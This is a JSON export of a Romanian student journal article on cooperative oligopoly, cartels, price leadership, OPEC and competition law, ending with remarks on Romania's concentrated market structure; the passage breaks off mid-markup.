{"id":481,"date":"2010-12-07T21:58:16","date_gmt":"2010-12-07T19:58:16","guid":{"rendered":"http:\/\/aafdutm.ro\/revista\/?p=481"},"modified":"2010-12-07T21:58:16","modified_gmt":"2010-12-07T19:58:16","slug":"oligopolul-cooperant-practici-restrictive","status":"publish","type":"post","link":"https:\/\/www.aafdutm.ro\/revista\/anul-ii\/oligopolul-cooperant-practici-restrictive\/","title":{"rendered":"Oligopolul cooperant &#8211; practici restrictive"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1.1 Introducere<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen dezvoltarea istorica a studiilor teoretice cu privire la oligopol se disting doua faze. \u00cen cadrul primei faze, denumita si traditionala, analiza a fost asezata pe studiul concurentei si a monopolului. Deoarece problemele decizionale ale oligopolului sunt mult mai complexe dec\u00e2t cele ale \u00eentreprinderii monopoliste sau ale celei concurentiale, protagonistii acestei faze, folosind un instrumentar de lucru foarte simplificat, au sf\u00e2rsit prin a reduce piata oligopolista la un caz particular al pietei monopoliste. \u00centre acestia la loc de frunte s-au situat Augustin Cournot (1801-1877), F.Y. Edgeworth si H. von Stackelberg caruia \u00eei si datoram o prima clasificare a formelor de piata. Premisa de baza de la care au pornit ei a fost urmatoarea: fiecare \u00eentreprindere adopta decizii de productie presupun\u00e2nd ca rivalii sai potentiali nu-si modifica nivelul lor de productie. Dar, \u00een acest caz, \u00eentr-adevar oligopolul este redus la o suma de \u201emici\u201d monopoluri.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">A doua faza \u00eencepe cu scoaterea \u00een evidenta a inconsistentei ipotezelor simplificatoare proprii teoriei traditionale si a cunoscut, la r\u00e2ndul ei, doua directii de actiune. Prima directie se distinge prin aplicarea teoriei jocurilor \u00een studiul comportamentului oligopolului, \u00eendeosebi dupa publicarea \u00een anul 1944 a cartii \u201eTheory of Games and Economic Behaviour\u201d a marelui matematician J. von Neuman s a economistului O. Morgenstern.\u00a0\u00a0 A doua directie se delimiteaza net de aportul teoriei traditionale care, \u00een buna parte, se marginea sa studieze comportamentul oligopolului mai mult pe cale deductiva, plec\u00e2nd, asa cum aratam mai sus, de la unele prezumtii cu caracter general. Aceasta ultima directie alege, \u00een schimb, calea elaborarii unor modele de comportament ale oligopolului c\u00e2t mai apropiate de situatia reala. Se disting, \u00een aceasta privinta, contributiile aduse de economistul italian Sylos Labini si a americanilor J. Bain si F. Modigliani.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dupa opinia acestora, \u00een timp ce pentru libera concurenta si monopoluri este posibila formularea unor legi de functionare bine definite si univoce, pentru oligopol este practic imposibil de a se desprinde o serie de legi cu aplicare universala. Drept urmare, subliniaza cei mentionati mai sus, sarcina cercetarii teoretice este aceea de a reflecta c\u00e2t mai fidel posibil asupra marii bogatii de aspecte ale pietei reale.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1.2 Oligopol-concept si etimologie<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Oligopolul poate fi definit ca o industrie \u00een care exista pu\u0163ine firme \u015fi mul\u0163i cump\u0103r\u0103tori. De regula \u00eenregistram o situatie de oligopol atunci c\u00e2nd piata este dominata de c\u00e2tiva producatori sau v\u00e2nzatori a caror putere economica este suficient de mare pentru a putea influenta pretul pietei. \u00cen acelasi timp, acesti producatori pot realiza si unele \u00eentelegeri \u00eentre ei de natura economica. Dat fiind numarul restr\u00e2ns de \u00eentreprinderi concurente, noua forma de piata se caracterizeaza \u00eenainte de toate prin faptul ca fiecare \u00eentreprinzator trebuie sa tina seama de data aceasta de reactiile ce le vor avea celelalte firme, la orice decizie economica majora luata.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen majoritatea economiilor moderne, aceasta este structura de pia\u0163\u0103 dominant\u0103 pentru produc\u0163ia de bunuri de consum \u015fi de folosin\u0163\u0103 \u00eendelungat\u0103, ca \u015fi a multor materii prime industriale, cum ar fi o\u0163elul \u015fi aluminiul. Serviciile sunt \u00eens\u0103 adesea produse \u00een condi\u0163ii oarecum mai competitive.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen contrast cu monopolul (care nu are competitori),o firm\u0103 de tip oligopol se confrunt\u0103 cu pu\u0163ini competitori, drept pentru care oligopoli\u015ftii au un comportament strategic, ceea \u00a0\u00eenseamn\u0103 c\u0103 ei \u0163in cont, \u00een mod explicit, de impactul deciziilor lor asupra firmelor competitive \u015fi de reac\u0163iile pe care le a\u015fteapt\u0103 din partea acestora. \u00cen ramurile oligopoliste, pre\u0163urile sunt, de obicei, administrate,iar produsele sunt, de obicei, diferen\u0163iate.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Din punct de vedere etimologic, termenul provine din limba greaca, oligos \u00eensemn\u00e2nd putini, c\u00e2tiva, iar polein, v\u00e2nzare.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Un oligopol se caracterizeaz\u0103 prin:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li><span style=\"color: #000000;\">num\u0103rul redus de produc\u0103tori prezen\u0163i pe pia\u0163\u0103, dar care au o for\u0163\u0103 economic\u0103 mare. Se consider\u0103 oligopol dac\u0103 pe pia\u0163\u0103 exist\u0103 cel pu\u0163in trei produc\u0103tori. Dac\u0103 sunt doar doi sau unul, se consider\u0103 c\u0103 exist\u0103 un <a title=\"Duopol \u2014 pagin\u0103 inexistent\u0103\" href=\"http:\/\/ro.wikipedia.org\/w\/index.php?title=Duopol&amp;action=edit&amp;redlink=1\">duopol<\/a> sau un <a title=\"Monopol\" href=\"http:\/\/ro.wikipedia.org\/wiki\/Monopol\">monopol<\/a>. <\/span><\/li>\n<li><span style=\"color: #000000;\">exist\u0103 bariere la intrarea pe pia\u0163\u0103 \u00een calitate de produc\u0103tor <\/span><\/li>\n<li><span style=\"color: #000000;\">este o form\u0103 mai mult caracteristic\u0103 \u0163\u0103rilor dezvoltate <\/span><\/li>\n<li><span style=\"color: #000000;\">este foarte clar eviden\u0163iat\u0103 diferen\u0163ierea m\u0103rfurilor <\/span><\/li>\n<li><span style=\"color: #000000;\">produc\u0103torii de\u0163in un oarecare grad de control al pre\u0163urilor <\/span><\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Deoarece \u00een cadrul unui oligopol fiecare produc\u0103tor sau v\u00e2nz\u0103tor cunoa\u015fte foarte bine procentul pe care \u00eel de\u0163ine din pia\u0163a produsului sau a serviciului respectiv \u015fi pentru c\u0103 orice modificare a pre\u0163ului sau a volumului produc\u0163iei de c\u0103tre una din firmele oligopoliste este reflectat\u0103 \u00een volumul de v\u00e2nz\u0103ri al celorlalte, exist\u0103 tendin\u0163a ca gradul de interdependen\u0163\u0103 \u00eentre firme s\u0103 fie foarte mare, \u00eenc\u00e2t fiecare firm\u0103 trebuie s\u0103-\u015fi stabileasc\u0103 pre\u0163ul \u015fi produc\u0163ia \u00een func\u0163ie de reac\u0163ia celorlate firme din oligopol, astfel c\u0103 odat\u0103 stabilite, pre\u0163urile \u00eentr-un oligopol sunt rigide.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">De obicei, oligopoliste sunt pie\u0163ele produc\u0163iei siderurgice, ale automobilelor, ale ma\u015finilor \u015fi echipamentelor destinate energeticii \u015fi industriei chimice, deoarece complexitatea utilajelor \u015fi tehnologiilor nu permit apari\u0163ia mai multor firme mici.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1.3 Formele pietei<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Structura de piata cea mai raspandita in tarile dezvoltate este aceea de oligopol,oferta si preturile fiind stabilite de cateva firme.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">In condi\u0163iile oligopolului, firma este un cautator de pret, ea exercitand o anumita influenta asupra pretului, dar neputandu-l alege ca in cazul monopolului deoarece trebuie sa tina seama de reactiile, uneori foarte viguroase, ale celoralte firme si consecintele lor asupra propriei activitati. Lumea oligopolului seamana cu un joc de sah cu mutari si contramutari imprevizibile.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">In derularea operatiunilor de cautare a preturilor de echilibru in conditii de oligopol pot sa apara doua situatii diametral opuse:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00fc\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0Recunoscandu-si interesul comun, firmele oligopoliste se inteleg cu privire la nivelul si dinamica preturilor, actionand ca si cand ar detine impreuna monopolulabsolut;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00fc\u00a0 \u00a0Alteori insa, oligopolistii abandoneaza \u201eplatforma comuna\u201d in favoarea interesului individual, lund decizii proprii privind volumul productiei create sau nivelul pretului.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Tr\u0103s\u0103turile pietei oligopoliste pot fi rezumate astfel:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li><span style=\"color: #000000;\">prin concentrarea produc\u0163iei, ele reu\u015fesc s\u0103 scad\u0103 costurile de produc\u0163ie pe termen lung;<\/span><\/li>\n<li><span style=\"color: #000000;\">pot oferi produc\u0163ia pe care o controleaz\u0103 la costuri minime, ceea ce le ofer\u0103 avantajul unor profituri mari;<\/span><\/li>\n<li><span style=\"color: #000000;\">au dorin\u0163a de a monopoliza pia\u0163a \u2013 de a ob\u0163ine suveranitatea pe pia\u0163\u0103 asupra cuplului pre\u0163-cantitate;<\/span><\/li>\n<li><span style=\"color: #000000;\"> pot ob\u0163ine tratament preferen\u0163ial \u00een vederea ob\u0163inerii de credite.<br \/>\nToate aceste caracteristici stimuleaz\u0103 apari\u0163ia numeroaselor tipuri de oligopoluri.<\/span><\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Criteriile dup\u0103 care se clasific\u0103 firmele oligopoliste sunt:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li><span style=\"color: #000000;\">dup\u0103      natura activit\u0103\u0163ii sau caracteristicile produc\u0163iei ori ale serviciilor;<\/span><\/li>\n<li><span style=\"color: #000000;\">dup\u0103      gradul de cooperare \u015fi a for\u0163ei de concuren\u0163\u0103.<br \/>\nDup\u0103 primul criteriu pot fi distinse dou\u0103 tipuri de oligopoluri:<\/span><\/li>\n<li><span style=\"color: #000000;\">Oligopoluri      care domin\u0103 pia\u0163a produselor omogene (petrol, o\u0163el, cafea);<\/span><\/li>\n<li><span style=\"color: #000000;\">Oligopoluri      care domin\u0103 pia\u0163a produselor neomogene (industria auto).<br \/>\nDup\u0103 al doilea criteriu oligopolurile se \u00eempart \u00een:<\/span><\/li>\n<li><span style=\"color: #000000;\">Oligopoluri      f\u0103r\u0103 coordonare<\/span><\/li>\n<li><span style=\"color: #000000;\">Oligopoluri      cu coordonare par\u0163ial\u0103<\/span><\/li>\n<li><span style=\"color: #000000;\">Oligopoluri      complet coordonate<\/span><\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><span style=\"text-decoration: underline;\">\u00cen categoria oligopolurilor<\/span><span style=\"text-decoration: underline;\"> f\u0103r\u0103 coordonare<\/span> intr\u0103 firmele care disput\u0103 pia\u0163a f\u0103r\u0103 nici un fel de<br \/>\n\u00een\u0163elegere prealabil\u0103, strategie, tactic\u0103 economic\u0103 sau comercial\u0103. Astfel, apar trei tipuri<br \/>\nde rela\u0163ii concuren\u0163iale:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">a. rela\u0163ii de confruntare agresiv\u0103 \u2013 se bazeaz\u0103 pe r\u0103zboiul economic \u00een care se<br \/>\nfolosesc ca arme pre\u0163urile de achizi\u0163ie a factorilor de produc\u0163ie, cantitatea produs\u0103 \u015fi<br \/>\npublicitatea.<br \/>\nb. rela\u0163ii hiperconcuren\u0163iale \u2013 specifice firmelor care produc bunuri u\u015for<br \/>\ndiferen\u0163iate \u015fi se manifest\u0103 prin calitate \u015fi for\u0163\u0103 inovatoare.<br \/>\nc. relatii \u00eenl\u0103n\u0163uite \u2013 specifice ramurilor cu mai multe firme care intr\u0103 \u00een raporturi<br \/>\neconomice \u00eencruci\u015fate determinate de raporturile \u00eentre ele, \u00een special datorit\u0103<br \/>\nspecializ\u0103rilor relativ restr\u00e2nse din cadrul ramurii.<br \/>\n\u00cen cazul <span style=\"text-decoration: underline;\">oligopolurilor<\/span><span style=\"text-decoration: underline;\"> cu coordonare par\u0163ial\u0103<\/span> se stabilesc fie raporturi de subordonare<br \/>\nfa\u0163\u0103 de o firm\u0103 lider, fie raporturi de \u00een\u0163elegere, coordonare voluntar\u0103.<br \/>\nLa <span style=\"text-decoration: underline;\">oligopolurile<\/span><span style=\"text-decoration: underline;\"> complet coordonate<\/span> \u00een\u0163elegerea \u00eembrac\u0103 forma unui acord scris<br \/>\n(secret sau public). Coordonarea prin acest acord poate avea ca obiect \u00een\u0163elegerea privind<br \/>\npre\u0163ul mediu de v\u00e2nzare, delimitarea pie\u0163elor, etc.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Pozi\u0163iile \u015fi strategiile abordate pot fi analizate plec\u00e2nd de la tipurile de oligopol,<br \/>\nspa\u0163iul concuren\u0163ial \u015fi tipul de elasticitate.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1.4 \u00a0Dilema fundamentala a oligopolului<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Comportamentul oligopolului este, \u00een mod necesar, un comportament strategic. \u00cen deciderea strategiilor, oligopoli\u015ftii se confrunt\u0103 cu dilema fundamental\u0103: competi\u0163ie sau cooperare.<br \/>\nFirmele ac\u0163ion\u00e2nd \u00eentr-o industrie oligpolist\u0103 vor ob\u0163ine mai multe profituri ca grup dac\u0103 coopereaz\u0103; orice firm\u0103 individual\u0103 poate \u00eens\u0103 realiza mai multe profituri pentru sine dac\u0103 dezerteaz\u0103, \u00een timp ce altele coopereaz\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00centr-o industrie perfect competitiv\u0103 exist\u0103 \u00eens\u0103, at\u00e2t de multe firme care nu pot atinge solu\u0163ia cooperant\u0103, dec\u00e2t dac\u0103 este format un corp central de guvernare, de c\u0103tre elel \u00eensele, sau de c\u0103tre guvern, pentru a impune comportamentul necesar tuturor firmelor. Dimpotriv\u0103, pu\u0163inele firme ale unei industrii oligopoliste vor recunoa\u015fte elel \u00eensele posibilitatea cooper\u0103rii pentru a evita pierderea de profituri care va rezulta din comportamentul rival.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Problema oligopolistului este foarte diferita de celelalte tipuri de intreprinzatori. Pe pietele cu libera concurenta nici un participant nu poate sa influenteze rezultatele altei companii pentru ca nu are suficienta forta de a modifica preturile. In cazul monopolului nu exista concurenti care pot fi deranjati.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dar la oligopol, concurentii pot deranja mult. Orice oligopolist poate influenta beneficiile celorlalti concurenti. Eforturile de a-si imbunatati propriile rezultate provoaca inexorabil deteriorarea rezultatelor celorlalti.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Una din problemele majore cu care se confrunta firmele \u00een conditii de oligopol este cea a pretului de v\u00e2nzare. Desi practicarea unei politici agresive a pretului nu este recomandabila, fiecare firma trebuie sa urmareasca \u00een permanenta reactia celorlalti producatori la modificarile ce le opereaza asupra acestui parametru.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Atunci c\u00e2nd pe piata actioneaza numai c\u00e2teva firme de dimensiuni apreciabile, la orice modificare a pretului de catre una din ele nu se poate sti cu certitudine c\u00e2t din cererea generala (din clientela totala) va ram\u00e2ne de partea ei si care parte va fi acaparata de concurenti. Totul va depinde de comportamentul lor.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Daca, de pilda, una dintre firme mareste pretul de v\u00e2nzare, ne este deloc sigur ca celelalte \u00eentreprinderi \u00eei vor urma exemplul. Nu o fac pentru ca, \u00een felul acesta, pot sa atraga o parte din clientela de partea lor si sa \u00eesi mareasca v\u00e2nzarile. Daca, dimpotriva, va proceda la scaderea pretului, mai devreme sau mai t\u00e2rziu si celelalte firme vor fi nevoite sa adopte aceeasi decizie, pentru ca, altfel, \u00eesi vor pierde cumparatorii..<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">In cazul cartelului ( oligopol cooperant ), pe baza estimarii cererii totale, se realizeaza intelegerea formala intre firme cu privire la pret si la impartirea pietelor. Acordurile dintre membrii cartelului sunt destul de fragile, pericolul prabusirii lor venind din doua directii:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">1)\u00a0\u00a0\u00a0\u00a0\u00a0 tentatia de a concura este , deseori atat de puternica, incat, mai devreme sau mai tarziu, unul sau altul dintre parteneri nu va mai actiona corespunzator intelegerilor convenite cu privire la pret sau la cantitatea produsa; din momentul in care interesul individual incepe sa prevaleze asupra celui comun, dorinta firmelor de a-si spori productia va conduce la reducerea pretului si la dezmembrarea cartelului care se va transforma in monopol;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">2)\u00a0\u00a0\u00a0\u00a0\u00a0 pentru a beneficia de unele avantaje create de cartel, concurentii din afara acestuia vor dori sa se asocieze, subrezind astfel coeziunea dintre partenerii initiali.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">In situatia oligopolului necooperant, ficare firma incearca, pe cont propriu, indepedent de celelalte, sa-si maximizeze profitul, urmand ca echilibrul pietei sa se realizeze fie dinspre cantitatile de bunuri create, fie dinspre preturi. Deci, firma regleaza fie volumul productiei, fie pretul, miscarea celuilalt element fiind lasata la latitudinea pietei.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Oligopolul necooperant sau asimetric este efectul manifestarii unui comportament de dominare a unor firme de catre altele. Acest comportament nu trebuie absolutizat, firmele oligopoliste fiind interdependente chiar si in ceea ce priveste formarea preturilor. Daca veniturile unei firme oligopoliste cresc prin sporirea volumului vanzarilor ca urmare a reducerii pretului, este de asteptat ca si concurentii sa procedeze la fel, recastigandu-si astfel clientii.Daca actiunile se repeta, apare un adevarat \u201erazboi al preturilor\u201d\u00a0 , ajungandu-se astfel la punctul zero al profitului, dar restabilindu-se echilibrul.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1.5 Cartelul-cea mai cunoscuta forma de oligopol cooperant <\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cartelul reprezint\u0103 un acord, o \u00een\u0163elegere \u00eentre c\u00e2teva firme care produc bunuri similare, cu privire la volumul produc\u0163iei, pre\u0163ul de v\u00e2nzare \u015fi zonele de piat\u0103, \u00een scopul maximiz\u0103rii profitului reunit. Termenul de cartel a ap\u0103rut cu sensul de trust comercial \u00een jurul anilor 1870, \u00een Germania \u00eens\u0103, \u00ee\u015fi are originea din italienescul \u201ccartello\u201d care in perioada 1550 \u2013 1560 \u00eensemna \u00a0\u201c o provocare scris\u0103 \u201c.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Forma maxima de intelegere, cea care maximizeaza beneficiile oligopolistilor este cartelul, un acord intre toti producatorii industriei, care pot avea urmatoarele forme:<\/span><\/p>\n<ul style=\"text-align: justify;\">\n<li><span style=\"color: #000000;\">Concurenta fara preturi. Fiecare companie incearca sa imbunatateasca calitatea, prezentarea sau orice alt factor, dar respectand pretul stabilit de comun acord. <\/span><\/li>\n<li><span style=\"color: #000000;\">Impartirea cotelor-parti sau a pietelor. Fiecarei intreprinderi i se distribuie o zona unde poate sa vanda, i se fixeaza o productie maxima care nu poate fi depasita.<\/span><\/li>\n<li><span style=\"color: #000000;\">O alta dificultate aditionala provine din faptul ca, legislatia multor tari interzice practicile acordurilor si in anumite ocazii s-au putut demonstra si pedepsi anumite industrii pentru realizarea de propuneri si presiuni de acest tip.<\/span><\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">O alta dificultate aditionala provine din faptul ca, legislatia multor tari interzice practicile acordurilor si in anumite ocazii s-au putut demonstra si pedepsi anumite industrii pentru realizarea de propuneri si presiuni de acest tip.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cea mai buna alternativa la cartel, ce eludeaza toate aceste inconveniente, este suprematia preturilor. Este o situatie foarte frecventa in lumea afacerilor. Cand exista o piata lider, ce fixeaza pretul si conditiile ofertei ce sunt acceptate de toti ceilalti fara necesitatea de a negocia. Exista trei tipuri de companii care se pot inscrie:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Intreprinderea dominanta, adica cea cu cea mai mare marime, cea mai mare cota de participare ce se diferentiaza de toate celelalte. Aceasta va fi si cea care va dispune de cele mai multe informatii, cea care cunoscand conditiile cererii la scara mare va putea estima pretul cel mai stabil si avantajos.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cea care beneficiaza de costuri mai mici pentru a dispune de tehnologia cea mai avansata. Acest caz rezulta a fi mai stabil daca compania ce fixeaza pretul ar fi una ce practica costuri mari, pretul ar rezulta si el a fi prea mare si ar fi mai probabil ca situatia sa denatureze spre un razboi al preturilor.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cea care se bucura de prestigiu si respect social. Este frecvent faptul ca un oligopolist, prin varsta sau formatiunea sa, sa fie considerat de concurentii sai expert si capabil de a diagnostica conditiile schimbatoare ale cererii, iar acestia ii vor accepta deciziile.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">In orice caz, aceste acorduri sunt intotdeauna instabile si fragile pentru ca daca vreunul dintre membrii ii tradeaza pe ceilalti, poate obtine mari beneficii.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><span style=\"text-decoration: underline;\">Principiul pretului conducator<\/span> care, la prima vedere nici n-ar trebui inclus \u00een clasa \u00eentelegerilor, este totusi o forma de manifestare a concurentei imperfecte \u00een care o \u00eentreprindere de mari proportii fixeaza pretul de v\u00e2nzare, iar celelalte firme o urmeaza pastr\u00e2ndu-si \u00een schimb deplina libertate \u00een alegerea produsului, activitatea promotionala a v\u00e2nzarilor, folosirea canalelor de distributie, etc. Daca marfa este omogena, pretul fixat de marea \u00eentreprindere va fi identic pentru toate. Daca, \u00een schimb, produsul este diferentiat, preturile vor fi diferite dar vor gravita \u00een aceeasi directie, astfel \u00eenc\u00e2t, diferentele de pret \u00eentre \u00eentreprinderi sa se mentina nealterate.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u00cen primii ani ai secolului XX, guvernul german, pentru a stimula exporturile a \u00eencurajat companiile na\u0163ionale s\u0103 se al\u0103ture cartelurilor. Dup\u0103 primul r\u0103zboi mondial, num\u0103rul cartelurilor a crescut, ajung\u00e2ndu-se la \u00eenceputul celui de-al doilea r\u0103zboi mondial la 200 de carteluri interna\u0163ionale. Acestea controlau 30% din comer\u0163ul mondial, \u00een industrii precum cea a cauciucului, produselor chimice, o\u0163elului, staniului.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Un mod frecvent de a rezolva problema este cel al \u00eentelegerilor \u00eentre \u00eentreprinderi. Practica a pus \u00een evidenta doua tipuri de \u00eentelegeri mai importante: cartelul si principiul pretului conducator, ambele amplu studiate de economistul american W. Fellner.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Odat\u0103 cu adoptarea legisla\u0163iei cu privire la concuren\u0163\u0103 \u015fi protejarea acesteia, \u00een \u0163\u0103rile dezvoltate, cu economie de pia\u0163\u0103, cartelurile, cea mai cunoscut\u0103 form\u0103 de oligopol cooperant au devenit ilegale.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dar, nu peste tot \u00een lume, uneori fiind chiar sprijinite de c\u0103tre guverne. Astfel c\u0103, \u00een timp ce \u00een Statele Unite acestea sunt ilegale, cartelurile na\u0163ionale sunt frecvente \u00een Japonia unde afacerile se desfa\u015foar\u0103 \u00een cadrul unui sistem de concuren\u0163\u0103 controlat\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Pentru a descoperi aceste practici considerate ilegale, multe \u0163\u0103ri aplic\u0103 politica de clemen\u0163\u0103. Prin aceast\u0103 metod\u0103, agen\u0163ii economici implica\u0163i \u00een carteluri, care decid sa pun\u0103 cap\u0103t acestor practici \u015fi s\u0103 furnizeze dovezi esen\u0163iale pot beneficia de imunitate sau de reducerea sanc\u0163iunii.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">De\u015fi \u00een Rom\u00e2nia nu a dat randament, \u00een multe \u0163\u0103ri s-au \u00eenregistrat rezultate pozitive. \u00cen Olanda spre exemplu, \u00eentr-un singur semestru, autorit\u0103\u0163ile au primit 470 de pl\u00e2ngeri.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Cel mai ilustrativ exemplu modern de cartel este OPEC (Organiza\u0163ia \u0162\u0103rilor Exportatoare de Petrol ).<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Dac\u0103 \u00een anii \u201970 organiza\u0163ia a fost foarte eficient\u0103 pe pia\u0163a petrolului, reu\u015find s\u0103 controleze oferta global\u0103 \u015fi pre\u0163urile ( de exemplu \u00een anii 1973 \u2013 1974, \u00een numai \u015fase luni, pre\u0163ul mondial la petrol a crescut de la 2,5$ la 11$ pe baril, pentru a ajunge la \u00eenceputul anilor \u201980 la aproximativ 34$ pe baril ), dup\u0103 1980 influen\u0163a acestuia a \u00eenceput s\u0103 se erodeze. Prin urmare, ponderea \u00een produc\u0163ia mondial\u0103 de petrol a \u0163\u0103rilor membre OPEC a sc\u0103zut de la 53,5% \u00een 1973 la 34% \u00een 1993. Cu toate acestea, ele continu\u0103 s\u0103 de\u0163in\u0103 controlul asupra unei p\u0103r\u0163i inseminate din aceast\u0103 pia\u0163\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">De\u015fi exist\u0103 opinii conform c\u0103rora un cartel odat\u0103 constituit tinde s\u0103 se comporte asem\u0103n\u0103tor monopolului, din cele prezentate mai sus putem concluziona c\u0103 aceste \u00een\u0163elegeri sunt greu de men\u0163inut pe termen lung.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"> <\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">\u201c Pericolul\u201d destr\u0103m\u0103rii lor \u00een timp vine din mai multe direc\u0163ii:<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">&#8211; profiturile substan\u0163iale \u00eensu\u015fite de membrii cartelului exercit\u0103 o puternic\u0103 atrac\u0163ie\u00a0 pentru al\u0163i produc\u0103tori, iar prevenirea intr\u0103rii lor pe pia\u0163\u0103 devine imposibil\u0103 pe termen lung \u00een absen\u0163a unor bariere naturale la intrare;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">&#8211; diferen\u0163ele de costuri fac mai dificil un acord asupra pre\u0163urilor, mai ales \u00een cadrul oligopolurilor diferen\u0163iate;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">&#8211; tenta\u0163ia unor firme de a ie\u015fi din \u00een\u0163elegerea stabilit\u0103 \u015fi de participa la competi\u0163ie este cu at\u00e2t mai puternic\u0103 cu c\u00e2t ele dispun de un avantaj de cost \u015fi interesul individual \u00eel domin\u0103 pe cel comun;<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">&#8211; cu c\u00e2t num\u0103rul firmelor este mai mare, cu at\u00e2t acceptarea unor concesii este mai dificil\u0103.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><strong>1.6 \u00a0Concluzii<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\"><em> Contributia IMM-urilor autohtone \u00a0la Produsul Intern Brut al Rom\u00e2niei este sub jumatate din media occidentala. <\/em>Daca Finlanda este numita tara celor 1.000 de lacuri, Elvetia &#8211; tara celor 26 de cantoane, Romaniei i se poate zice tara celor 20 de oligopoluri.<br \/>\nUn studiu al Bancii Nationale arata ca, desi 72,8% din companiile nefinanciare romanesti sunt intreprinderi mici si mijlocii, 60% din valoarea adaugata bruta se realizeaza in sfera corporatiilor, \u00een timp ce \u00een Statele Unite peste 90% din PIB se creeaza in sfera intreprinderilor mici \u015fi mijlocii.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"color: #000000;\">Daca Romania, o piata cu 22 de milioane de consumatori, are 500.000 de companii, Polonia, cu 38 de milioane, ar trebui sa aiba cel mult un milion de firme.Dar, \u00a0polonezii au peste 3 milioane de companii, iar la noi se verifica definitia oligopolului: acea structura a pietei in care exista un numar mic de producatori (ofertanti) si un numar mare de cumparatori.<\/span><\/p>\n<p style=\"text-align: 